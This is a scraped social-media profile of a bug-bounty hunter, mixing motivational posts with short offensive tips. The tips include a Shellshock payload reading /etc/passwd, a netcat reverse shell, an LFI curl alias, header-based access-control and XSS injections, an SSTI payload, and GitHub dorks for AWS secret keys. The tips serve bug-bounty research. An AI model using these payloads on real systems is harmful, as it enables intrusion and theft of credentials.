Ahsan Khan
@hunter0x7
Followers
33,045
Following
1,337
Media
115
Statuses
907
[Hacker + lover of bash] I Don't know how to hack but i know how to pwnd!
Joined January 2019
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
FEMA
• 456407 Tweets
Mutombo
• 207618 Tweets
Mets
• 159202 Tweets
Verizon
• 115449 Tweets
Braves
• 92955 Tweets
Kemp
• 81758 Tweets
Pete Rose
• 71106 Tweets
#grandefratello
• 44943 Tweets
Lindor
• 31846 Tweets
Hall of Fame
• 28486 Tweets
Titans
• 27131 Tweets
#الاجتياح_البري
• 27061 Tweets
Dolphins
• 23657 Tweets
Seahawks
• 17093 Tweets
あと3ヶ月
• 16919 Tweets
コーヒーの日
• 15221 Tweets
Happy New Month
• 14681 Tweets
WELCOME HOME BAMBAM
• 14223 Tweets
都民の日
• 12712 Tweets
Hit King
• 12653 Tweets
#SnowManライブグッズ
• 12032 Tweets
愛知1区
• 11240 Tweets
残り3ヶ月
• 11069 Tweets
河村たかし名古屋市長
• 10466 Tweets
Pinned Tweet
My spotlight with bugcrowd 🤗🤗
While he hits some pretty big bounties, you might be surprised how
@hunter0x7
got started in bug hunting.
Join us for this researcher spotlight and down to earth chat with Ahsan Khan!
#ItTakesACrowd
25
35
299
31
23
495
GET /admin HTTP/1.1
Host:
...
Access is denied
GET /test HTTP/1.1
Host:
X-Original-URL: /admin
HTTP/1.1 200 OK
23
529
2K
Github
org:Target "bucket_name"
org:Target "aws_access_key"
org:Target "aws_secret_key"
org:Target "S3_BUCKET"
org:Target "S3_ACCESS_KEY_ID"
org:Target "S3_SECRET_ACCESS_KEY"
org:Target "S3_ENDPOINT"
org:Target "AWS_ACCESS_KEY_ID"
org:Target "list_aws_accounts"
18
584
2K
site: "company"
site: "company"
site: "company"
site: "company"
site: "company"
site: "company"
site: "company"
1/3
22
474
1K
~Pwn
1. Create an account email
@burp_collab
*
2. Forgot password
3. Received requests from internal server + SMTP connection details
4. Got Internal headers + origin IP
5. = (403)
6. = (Headers + Origin IP = pwn)
Pwning isn't easy~
26
419
1K
Replaced:
Netflix with Recon (Learning)
Youtube with Tryhackme
Weekends with Hunting
Instagram with Books
Negativity with Love
21
151
1K
~Pwning
1. Gau + Waybackurls = Collected endpoints
2. Found
3. Bypassed using sqli ('1 or 1 =' 1)
4. RCE through Node.js deserialization
Tip: RECON is everything ❤️
21
289
1K
finding endpoints:
cat js | grep -o -E "(https?://)?/?[{}a-z0-9A-Z_\.-]{2,}/[{}/a-z0-9A-Z_\.-]+"
11
272
978
* You won't do it
* You are useless
* You are nothing
* You can't
* You are wasting Time
* You are poor
And now their yearly income is my pocket money so fuck you
48
89
938
~Pwning
1. Recon = Found log file: web/path/wget-log
2. Found Server IP in the logs file
3. Tested Server IP & Found .git dir: wget -m -I .git web/.git/
4. git status & found backup zip file
5. While reading files found: app/file.php disclosing SSH root Credentials
6. RCE
30
223
933
Selected a program;
1st weak = 0 bugs
2nd weak = 2+ bugs
3rd weak = 50+ bugs
4th weak = 100% traiged
Rewarded for 50+ bugs
Dig deep until you find 💎
40
71
819
Test on CGI (cgi-bin)
User-Agent: () { :;}; echo $(</etc/passwd)
() { :;}; /usr/bin/nc ip 1337 -e /bin/bash
11
271
786
Pwning Admin Panels (Host header poisoning)
POST /admin/forgot_password HTTP/1.1
Host: web..com"><img src="Blind XSS Here">
19
258
768
alias lfi="curl -H 'Accept: ../../../../../../../../../etc/passwd{{' "
7
169
695
Bypassed SSTI Again
Payload: {{%% if 'ahsan' == 'ahsan' %%}} a {{%% endif %%}}
Bounty: 1000$
14
188
683
Selected a program;
1st attempt = 3.5k$
After few months
2nd attempt = 7.5k$
After few months (Bypassed the fixes + New feature bugs)
3rd attempt = 10k$
Come back with 🔥
13
28
600
you won't do it because you are weak in learning, Yes they are right that I am weak
therefore I am working 110+ hours per week to improve this weakness
17
45
474
Admin Pwn (Stories)
1. Found panel
2. Playing with GitHub for 2 days found a sandbox credentials
3. Used the same credentials on the panel and 🔥
4. After digging found SQLi
5. It took 3 days to pwn this panel
Pwning isn't easy ~
9
58
382
Be creative and focus on functionality testing!
(Attack the main functions of the site for which the site is made)
13
29
379
If you think it's WordPress cms and you cant pwn it then u are wrong
13
19
378
When I don't have anything to do
I do work
When I get bored
I do work
When I get sad
I do work
13
24
277
site: "company"
site: "company"
site: "company"
site: "company"
site: "company"
site: "company"
site:*.atlassian.net "company"
3/3
1
83
265
If duplicates hurt you
remember that there are others out there who are not even trying & you are not one of them
You are already making an effort, and that is something to be proud of.
Duplicates shouldn't hurt you cz you are digging so keep digging until you win.
6
39
268
13
10
235
~Pwn
Will be speaking at
@InfoSecComm
tomorrow so who’s waiting ♥️
Talk: Accessing Admin Panels
22
10
201
@remonsec
I see on ma left side there is no one to help and the right side which is full of failure and ma front a screen which is called future so buddy make yourself that much busy in the work so you dont have much time to think about to look on the left or right ♥️ good luck
5
28
190
Failed in 9th
Failed in 10th
Failed in 11th
Failed in 12th
Failed in 13th
Failed in 14th
Failed in 15th
Still going (Studies)
Failure is the path to success
7
9
179
site: "company"
site: "company"
site: "company"
site: "company"
site: "company"
site: "company"
site: "company"
2/3
0
47
177
Update no 3: Reported 15 submissions (total).
Critical one:
Used Js Miner & for finding sen* info in JS files.
Found a JS file disclosing access token without any endpoint.
(1/3)
5
42
178
